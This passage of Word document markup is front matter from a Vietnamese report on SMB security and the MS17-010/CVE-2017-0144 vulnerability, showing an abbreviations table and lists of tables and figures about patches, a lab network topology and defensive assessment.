        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="5ACA34E5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>NSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="1A5C1673" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Nmap Scripting Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="59D60AC6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cơ chế kịch bản tự động hóa mở rộng của công cụ Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="53354F51" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4FD2CAD4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>MSF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="64BC15C2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1E9B9F27" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Bộ công cụ mã nguồn mở phục vụ kiểm thử xâm nhập</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="5C4578B9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="3F30C073" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>FEA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4C53D671" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Full Extended Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="47567EA6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cấu trúc danh sách thuộc tính mở rộng đầy đủ trong hệ điều hành</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="6A93461D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="703549EA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="476187C0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Common Vulnerabilities and Exposures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="03A1A067" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Hệ thống định danh chuẩn hóa các điểm yếu và lỗ hổng bảo mật</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="469C3B86" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2EF5B74E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>VLAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2385ECFA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Virtual Local Area Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="63E0EACA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mạng cục bộ ảo phân tách miền quảng bá và định tuyến Layer 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="4950A7C0" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="72A44BFC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>UTM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2403E741" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Unified Threat Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="44CB60E2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Thiết bị quản lý và phòng thủ mối đe dọa an ninh mạng thống nhất</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36404EF0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C210D06" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>DANH MỤC BẢNG BIỂU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFD9616" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Bảng 1.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>So sánh đặc tính kỹ thuật cơ bản giữa SMBv1, SMBv2 và SMBv3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D73D44F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Bảng 1.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Các nhóm lỗ hổng SMB tiêu biểu trong bản tin an ninh MS17-010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA4C088" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Bảng 1.3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Ánh xạ gói cập nhật KB4012212 theo các phiên bản Windows phổ biến</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7ACF30" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Bảng 1.4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Khung đánh giá trạng thái an ninh giao thức SMB theo 4 cấp độ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086B3D9B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Bảng 1.5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Bảng đối chiếu trạng thái kỹ thuật và bề mặt rủi ro trước và sau phòng thủ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15271CA2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bảng 2.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Ma trận phân bổ địa chỉ IP, VLAN và thông số kỹ thuật các nút mạng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1882249B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Bảng 2.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Ma trận phân tích chuỗi nhân quả qua 4 trạng thái Snapshot đơn biến</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C31929" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Bảng 2.3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Bảng đối chiếu các kỹ thuật kiểm thử với các tiền điều kiện và 4 cấp độ trạng thái</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA92557" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Bảng 2.4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Ma trận bằng chứng thực nghiệm đối chiếu đa nguồn (Evidence Matrix)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0A6694" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C0E0BDD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>DANH MỤC HÌNH VÀ SƠ ĐỒ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E9FDCC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Sơ đồ 1.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Kiến trúc phân tầng Client – Server của dịch vụ SMB trên Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BA2CCA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Sơ đồ 1.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Quy trình thiết lập phiên làm việc ba giai đoạn của giao thức SMB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69550545" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Sơ đồ 1.3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Cơ chế tràn số học danh sách FEA và ghi đè vùng nhớ Non-Paged Pool trong CVE-2017-0144</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB80843" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Sơ đồ 1.4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Mô hình quan hệ phụ thuộc giữa 4 cấp độ đánh giá trạng thái an ninh SMB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1821EBF4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Sơ đồ 2.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Sơ đồ topo mạng phân đoạn doanh nghiệp mô phỏng (Enterprise Network Topology)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68659B9F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Sơ đồ 2.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Sơ đồ tuần tự các pha kiểm thử theo mô hình chuỗi nhân quả</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D101481" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Sơ đồ 2.3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Quy trình quản lý trạng thái máy ảo và cơ chế khôi phục tức thời qua Snapshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEF685E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="578386E9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619">
      <w:pPr>
        <w:sectPr w:rsidR="00DB6619">
          <w:pgSz w:w="11909" w:h="16834"/>
          <w:pgMar w:top="1987" w:right="1138" w:bottom="1699" w:left="1987" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BDB6B4A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
